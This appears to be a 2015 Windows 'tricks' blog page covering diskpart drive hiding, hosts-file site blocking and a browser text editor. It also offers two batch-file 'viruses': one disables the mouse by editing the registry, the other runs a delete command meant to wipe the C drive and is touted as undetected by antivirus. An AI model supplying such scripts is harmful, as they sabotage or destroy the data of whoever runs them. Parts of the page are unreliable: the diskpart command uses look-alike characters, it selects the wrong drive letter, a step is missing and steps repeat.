Sunday, October 11, 2015
Sunday, September 13, 2015
How to Hide Hard Drive
Step 1 - open Cmd
Step 2- Type "Dіskраrt " and hit enter
Step 3 - Now you have to type ” lіst vоlumе ” аnd Hit Enter to see the list of all drives details
Step 4 - Now i have some personal data in my drive E which i dont want any other person to peep in, So i want to hide it, For that i will type ” Select volume D ” and hit Enter.
By now you have selected the Drive successfully which you want to hide. But the last part which is to Hide the Drive is still remaining.
Step 6. To hide the drive you have to type “ Remove letter D ” and hit enter.
Congrats you have successfully Hidden the drive.
HOW DO I GET THE DRIVE BACK ?
How to Block any Website
1- Go to C:\Windows\System32\drivers\etc
2- Open hosts file in notepad
3- Write 127.0.0.1 www.googl.com
3- Write 127.0.0.1 www.googl.com
and save ! now google,com will be blocked
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
127.0.0.1 www.google.com
Tuesday, September 8, 2015
Create a virus that disable mouse
How To Disable Mouse
1. Open Notepad and copy below codesrem ---------------------------------2. Save this file as virus.bat
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
3. Done you just created your virus.
Make Dangerous Virus In A Minute
What will this virus do ?
You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus.How to Make the virus ?
1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y
2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.
Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
Use Web Browsers As Text Editor
In this tutorial i will show you a simple and interesting trick to use your web browser such as Google Chrome or Mozilla Firefox as a simple text editor like Notepad. This trick works on all web browsers. So lets get started.
How To Do ?
1 Copy below code in browser Url Section
2. Now Press Enter.
3. Now you can type anything as would do on any other text editor like Notepad.
4. To save your text file Press Ctrl + S and save it as anything.txt (.txt Is Must)
data:text/html, <html contenteditable>
2. Now Press Enter.
3. Now you can type anything as would do on any other text editor like Notepad.
4. To save your text file Press Ctrl + S and save it as anything.txt (.txt Is Must)
